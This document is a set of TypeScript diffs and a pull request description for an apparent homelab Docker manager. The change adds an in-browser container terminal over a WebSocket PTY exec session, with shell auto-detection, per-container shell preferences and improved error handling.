+  }, [containerId, host, shell, terminal, enabled, reconnectKey]);
 
-  return { isConnected, error };
+  return { isConnected, error, resolvedShell, sessionEnded, reconnect };
 }

--- a/src/hooks/useContainerTerminal.ts
+++ b/src/hooks/useContainerTerminal.ts
@@ -83,6 +83,8 @@ export function useContainerTerminal({
         const msg = JSON.parse(event.data as string) as { type?: string; name?: string };
         if (msg.type === 'shell' && typeof msg.name === 'string') {
           setResolvedShell(msg.name);
+        } else if (msg.type) {
+          console.warn('[useContainerTerminal] unknown control frame type:', msg.type);
         }
       } catch {
         // Non-JSON text frame; ignore.

--- a/src/hooks/useContainerTerminal.ts
+++ b/src/hooks/useContainerTerminal.ts
@@ -99,8 +99,14 @@ export function useContainerTerminal({
       }
     };
 
-    ws.onerror = () => {
+    ws.onerror = (e) => {
+      // Without surfacing an error here, the UI would wait forever on the close
+      // handler, which may not fire (or may fire with an empty reason) when the
+      // browser cannot reach the server at all. A subsequent close handler with
+      // a specific reason will overwrite this generic message.
+      console.error('[useContainerTerminal] ws error', e);
       setIsConnected(false);
+      setError(new Error('Terminal WebSocket error'));
     };
 
     const dataListener = terminal.onData((data) => {

--- a/src/hooks/useContainerTerminal.ts
+++ b/src/hooks/useContainerTerminal.ts
@@ -46,10 +46,9 @@ export function useContainerTerminal({
     const cols = terminal.cols;
     const rows = terminal.rows;
 
-    const httpBase = apiUrl(`/api/docker-exec/${encodeURIComponent(containerId)}`);
-    // Replace http(s) scheme with ws(s) to build the WebSocket URL.
-    const wsBase = httpBase.replace(/^http/, 'ws');
-    const url = `${window.location.protocol === 'https:' ? wsBase.replace(/^ws:/, 'wss:') : wsBase}?host=${encodeURIComponent(host)}&shell=${encodeURIComponent(shell)}&cols=${cols}&rows=${rows}`;
+    const wsScheme = window.location.protocol === 'https:' ? 'wss:' : 'ws:';
+    const path = apiUrl(`/api/docker-exec/${encodeURIComponent(containerId)}`);
+    const url = `${wsScheme}//${window.location.host}${path}?host=${encodeURIComponent(host)}&shell=${encodeURIComponent(shell)}&cols=${cols}&rows=${rows}`;
 
     const ws = new WebSocket(url);
     wsRef.current = ws;

--- a/src/hooks/useDockerSettings.ts
+++ b/src/hooks/useDockerSettings.ts
@@ -22,6 +22,8 @@ export interface DockerSettingsValue {
   isContainerExpanded: (containerId: string) => boolean;
   toggleStackExpanded: (stackEntityId: string) => void;
   isStackExpanded: (stackEntityId: string) => boolean;
+  setContainerShell: (containerKey: string, shell: string) => void;
+  getContainerShell: (containerKey: string) => string | undefined;
 }
 
 /**
@@ -76,6 +78,25 @@ export function useDockerSettings(): DockerSettingsValue {
     [stacks.expandedStacks],
   );
 
+  const setContainerShell = useCallback((containerKey: string, shell: string) => {
+    optimisticSet(SETTINGS_KEYS.docker.containerShells, (prev) => {
+      const current: Record<string, string> = (() => {
+        try {
+          const p = JSON.parse(prev ?? '{}') as unknown;
+          return (typeof p === 'object' && p !== null && !Array.isArray(p))
+            ? (p as Record<string, string>)
+            : {};
+        } catch { return {}; }
+      })();
+      return JSON.stringify({ ...current, [containerKey]: shell });
+    });
+  }, [optimisticSet]);
+
+  const getContainerShell = useCallback(
+    (containerKey: string): string | undefined => docker.containerShells[containerKey],
+    [docker.containerShells],
+  );
+
   return useMemo<DockerSettingsValue>(() => ({
     docker,
     stacks,
@@ -88,6 +109,8 @@ export function useDockerSettings(): DockerSettingsValue {
     isContainerExpanded,
     toggleStackExpanded,
     isStackExpanded,
+    setContainerShell,
+    getContainerShell,
   }), [
     docker,
     stacks,
@@ -100,5 +123,7 @@ export function useDockerSettings(): DockerSettingsValue {
     isContainerExpanded,
     toggleStackExpanded,
     isStackExpanded,
+    setContainerShell,
+    getContainerShell,
   ]);
 }

--- a/src/hooks/useXtermSetup.ts
+++ b/src/hooks/useXtermSetup.ts
@@ -74,7 +74,7 @@ export function useXtermSetup(options: ITerminalOptions): UseXtermSetupResult {
       terminalRef.current?.dispose();
       terminalRef.current = null;
     };
-  // options captured once at mount — changing options mid-session would require recreating the xterm instance
+  // options captured once at mount; changing options mid-session would require recreating the xterm instance
   // eslint-disable-next-line react-hooks/exhaustive-deps
   }, []);
 

--- a/src/hooks/useXtermSetup.ts
+++ b/src/hooks/useXtermSetup.ts
@@ -53,9 +53,7 @@ export function useXtermSetup(options: ITerminalOptions): UseXtermSetupResult {
         fitAddonRef.current = fitAddon;
         term.loadAddon(fitAddon);
 
-        // containerRef.current is null in test environments (renderHook renders no DOM),
-        // but the mock terminal's open() is a no-op so this is safe to call either way
-        term.open(containerRef.current!);
+        if (containerRef.current) term.open(containerRef.current);
 
         if (containerRef.current) {
           requestAnimationFrame(() => {

--- a/src/hooks/useXtermSetup.ts
+++ b/src/hooks/useXtermSetup.ts
@@ -1,0 +1,122 @@
+import { useEffect, useRef, useState } from 'react';
+import type { RefObject } from 'react';
+import type { Terminal as TerminalType, ITerminalOptions } from '@xterm/xterm';
+import { getCssVar } from '@/lib/charts/css-vars';
+import { RESIZE_DEBOUNCE_MS } from '@/lib/constants/ui-timing';
+
+interface UseXtermSetupResult {
+  containerRef: RefObject<HTMLDivElement | null>;
+  terminal: TerminalType | null;
+}
+
+export function useXtermSetup(options: ITerminalOptions): UseXtermSetupResult {
+  const containerRef = useRef<HTMLDivElement>(null);
+  const [terminal, setTerminal] = useState<TerminalType | null>(null);
+  const terminalRef = useRef<TerminalType | null>(null);
+  const fitAddonRef = useRef<{ fit(): void } | null>(null);
+
+  useEffect(() => {
+    let disposed = false;
+
+    void (async () => {
+      try {
+        const [xtermMod, fitMod] = await Promise.all([
+          import('@xterm/xterm'),
+          import('@xterm/addon-fit'),
+        ]);
+        await import('@xterm/xterm/css/xterm.css');
+        if (disposed) return;
+
+        // Handle CJS default export (bun) vs ESM named export (Vite)
+        const xtermAny = xtermMod as Record<string, unknown>;
+        const Terminal = (xtermAny.Terminal ??
+          (xtermAny.default as Record<string, unknown>).Terminal) as typeof TerminalType;
+        const fitAny = fitMod as Record<string, unknown>;
+        const FitAddon = (fitAny.FitAddon ??
+          (fitAny.default as Record<string, unknown>).FitAddon) as new () => import('@xterm/xterm').ITerminalAddon & { fit(): void };
+
+        const bg = getCssVar('--mui-palette-background-chartBg');
+        const fg = getCssVar('--chart-text-muted');
+
+        const term = new Terminal({
+          fontSize: 12,
+          fontFamily: 'monospace',
+          scrollback: 2000,
+          ...options,
+          theme: {
+            ...(bg && { background: bg }),
+            ...(fg && { foreground: fg }),
+          },
+        });
+
+        const fitAddon = new FitAddon();
+        fitAddonRef.current = fitAddon;
+        term.loadAddon(fitAddon);
+
+        // containerRef.current is null in test environments (renderHook renders no DOM),
+        // but the mock terminal's open() is a no-op so this is safe to call either way
+        term.open(containerRef.current!);
+
+        if (containerRef.current) {
+          requestAnimationFrame(() => {
+            try { fitAddon.fit(); } catch { /* not visible yet */ }
+          });
+        }
+
+        terminalRef.current = term;
+        setTerminal(term);
+      } catch (err) {
+        console.error('Failed to initialize terminal:', err);
+      }
+    })();
+
+    return () => {
+      disposed = true;
+      fitAddonRef.current = null;
+      terminalRef.current?.dispose();
+      terminalRef.current = null;
+    };
+  // options captured once at mount — changing options mid-session would require recreating the xterm instance
+  // eslint-disable-next-line react-hooks/exhaustive-deps
+  }, []);
+
+  // Sync terminal theme when the color scheme changes (xterm uses a canvas renderer,
+  // so CSS variable changes don't apply automatically)
+  useEffect(() => {
+    if (!terminal) return;
+    const root = document.documentElement;
+    const applyTheme = () => {
+      const bg = getCssVar('--mui-palette-background-chartBg');
+      const fg = getCssVar('--chart-text-muted');
+      terminal.options.theme = {
+        ...(bg && { background: bg }),
+        ...(fg && { foreground: fg }),
+      };
+    };
+    const observer = new MutationObserver(applyTheme);
+    observer.observe(root, { attributes: true, attributeFilter: ['data-color-scheme'] });
+    return () => observer.disconnect();
+  }, [terminal]);
+
+  // Re-fit on container resize (debounced to avoid rapid reflows during Collapse animation).
+  // containerRef.current is populated in real use (component renders <div ref={containerRef}>);
+  // in test environments it may be null, so we guard against it.
+  useEffect(() => {
+    if (!fitAddonRef.current) return;
+    if (!containerRef.current) return;
+    let timer: ReturnType<typeof setTimeout> | undefined;
+    const observer = new ResizeObserver(() => {
+      if (timer !== undefined) clearTimeout(timer);
+      timer = setTimeout(() => {
+        try { fitAddonRef.current?.fit(); } catch { /* layout transition */ }
+      }, RESIZE_DEBOUNCE_MS);
+    });
+    observer.observe(containerRef.current);
+    return () => {
+      if (timer !== undefined) clearTimeout(timer);
+      observer.disconnect();
+    };
+  }, [terminal]);
+
+  return { containerRef, terminal };
+}

--- a/src/hooks/useXtermSetup.ts
+++ b/src/hooks/useXtermSetup.ts
@@ -7,11 +7,14 @@ import { RESIZE_DEBOUNCE_MS } from '@/lib/constants/ui-timing';
 interface UseXtermSetupResult {
   containerRef: RefObject<HTMLDivElement | null>;
   terminal: TerminalType | null;
+  /** Set when the dynamic `@xterm/xterm` import or terminal construction fails (CSP, chunk hash mismatch after deploy, network blip). Lets the parent show an error instead of spinning on the skeleton forever. */
+  error: Error | null;
 }
 
 export function useXtermSetup(options: ITerminalOptions): UseXtermSetupResult {
   const containerRef = useRef<HTMLDivElement>(null);
   const [terminal, setTerminal] = useState<TerminalType | null>(null);
+  const [error, setError] = useState<Error | null>(null);
   const terminalRef = useRef<TerminalType | null>(null);
   const fitAddonRef = useRef<{ fit(): void } | null>(null);
 
@@ -65,6 +68,9 @@ export function useXtermSetup(options: ITerminalOptions): UseXtermSetupResult {
         setTerminal(term);
       } catch (err) {
         console.error('Failed to initialize terminal:', err);
+        if (!disposed) {
+          setError(err instanceof Error ? err : new Error(String(err)));
+        }
       }
     })();
 
@@ -103,10 +109,29 @@ export function useXtermSetup(options: ITerminalOptions): UseXtermSetupResult {
     if (!fitAddonRef.current) return;
     if (!containerRef.current) return;
     let timer: ReturnType<typeof setTimeout> | undefined;
+    // Log the first fit() failure once instead of silently swallowing every tick
+    // forever. A persistently throwing fit() (renderer disposed, canvas detached)
+    // would otherwise drop ResizeObserver fires into a black hole. After 3
+    // consecutive failures we disconnect the observer: the terminal is in a
+    // permanently broken state and continuing to call fit() can't recover it.
+    let loggedFitError = false;
+    let consecutiveFitErrors = 0;
     const observer = new ResizeObserver(() => {
       if (timer !== undefined) clearTimeout(timer);
       timer = setTimeout(() => {
-        try { fitAddonRef.current?.fit(); } catch { /* layout transition */ }
+        try {
+          fitAddonRef.current?.fit();
+          consecutiveFitErrors = 0;
+        } catch (err) {
+          consecutiveFitErrors += 1;
+          if (!loggedFitError) {
+            loggedFitError = true;
+            console.error('[useXtermSetup] fit() failed:', err);
+          }
+          if (consecutiveFitErrors >= 3) {
+            observer.disconnect();
+          }
+        }
       }, RESIZE_DEBOUNCE_MS);
     });
     observer.observe(containerRef.current);
@@ -116,5 +141,5 @@ export function useXtermSetup(options: ITerminalOptions): UseXtermSetupResult {
     };
   }, [terminal]);
 
-  return { containerRef, terminal };
+  return { containerRef, terminal, error };
 }

--- a/src/lib/constants/settings-keys.ts
+++ b/src/lib/constants/settings-keys.ts
@@ -16,6 +16,7 @@ export const SETTINGS_KEYS = {
     chartWindowSeconds: 'docker/chartWindowSeconds',
     expandedHosts: 'docker/expandedHosts',
     expandedContainers: 'docker/expandedContainers',
+    containerShells: 'docker/containerShells',
     decimals: {
       cpu: 'docker/decimals/cpu',
       memory: 'docker/decimals/memory',

--- a/src/lib/mock/generators/settings.ts
+++ b/src/lib/mock/generators/settings.ts
@@ -19,6 +19,7 @@ export function generateDefaultSettings(): Record<string, string> {
     [SETTINGS_KEYS.docker.chartWindowSeconds]: '60',
     [SETTINGS_KEYS.docker.expandedHosts]: '[]',
     [SETTINGS_KEYS.docker.expandedContainers]: JSON.stringify([`${homeassistant.host}/${homeassistant.containerId}`]),
+    [SETTINGS_KEYS.docker.containerShells]: '{}',
     [SETTINGS_KEYS.docker.decimals.cpu]: '1',
     [SETTINGS_KEYS.docker.decimals.memory]: '1',
     [SETTINGS_KEYS.docker.decimals.diskSpeed]: '1',

--- a/vite.config.ts
+++ b/vite.config.ts
@@ -43,7 +43,7 @@ export default defineConfig({
   },
   plugins: [
     isDev && devtools(),
-    nitro(),
+    nitro({ serverDir: 'server' }),
     tailwindcss(),
     tanstackStart({
       spa: {

--- a/vite.config.ts
+++ b/vite.config.ts
@@ -43,7 +43,7 @@ export default defineConfig({
   },
   plugins: [
     isDev && devtools(),
-    nitro({ serverDir: 'server' }),
+    nitro({ serverDir: 'server', features: { websocket: true } }),
     tailwindcss(),
     tanstackStart({
       spa: {


### PR DESCRIPTION
## Summary

- Adds Logs/Terminal tab strip to the Docker container detail panel (Logs tab active by default)
- Terminal opens a WebSocket PTY exec session: browser connects to a Nitro WebSocket proxy route, which authenticates against the DB, signs a per-host JWT, and proxies bidirectionally to the agent sidecar
- Agent side: probes bash → sh → ash in order (5s timeout per shell); starts a Docker PTY exec and pipes stdin/stdout between the WebSocket and the exec stream
- Shell preference persisted per host/name in settings (docker/containerShells); auto-detect runs when no preference is saved or when the user resets to "auto" via the dropdown
- Container stopped mid-session: terminal freezes in place (grayed overlay, stdin disabled) without evicting the user from the tab
- Terminal tab disabled (unclickable) for stopped containers with no prior session

## Test plan

- [ ] Expand a running container row — Logs tab active by default, log stream appears
- [ ] Click Terminal tab — xterm.js opens, shell probe runs, prompt appears
- [ ] Type a command, verify output
- [ ] Resize the panel, verify the PTY reflows correctly
- [ ] Stop the container while terminal is open — verify frozen overlay appears
- [ ] Start the container again — verify terminal tab re-enables
- [ ] Change shell via dropdown, verify preference persists across page reload
- [ ] Expand a stopped container — verify Terminal tab is disabled
- [ ] Expand a running container with no bash — verify sh fallback

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * Interactive container exec over WebSocket with shell selection (auto/explicit), PTY resize, reconnect/session-end handling, per-container shell preference, Logs/Terminal tabs and frozen "Container stopped" behavior.

* **Tests**
  * Broad test coverage added for exec/PTY flows, raw socket upgrades, WebSocket bridging, terminal hooks, xterm setup, and settings parsing.

* **Refactor**
  * Log viewer unified to a Logs/Terminal panel with shared xterm setup hook.

* **Chores**
  * Dev server websockets enabled; local compose build target adjusted.

[![Review Change Stack](https://storage.googleapis.com/coderabbit_public_assets/review-stack-in-coderabbit-ui.svg)](https://app.coderabbit.ai/change-stack/jaredglaser/homelab-manager/pull/168)
<!-- end of auto-generated comment: release notes by coderabbit.ai -->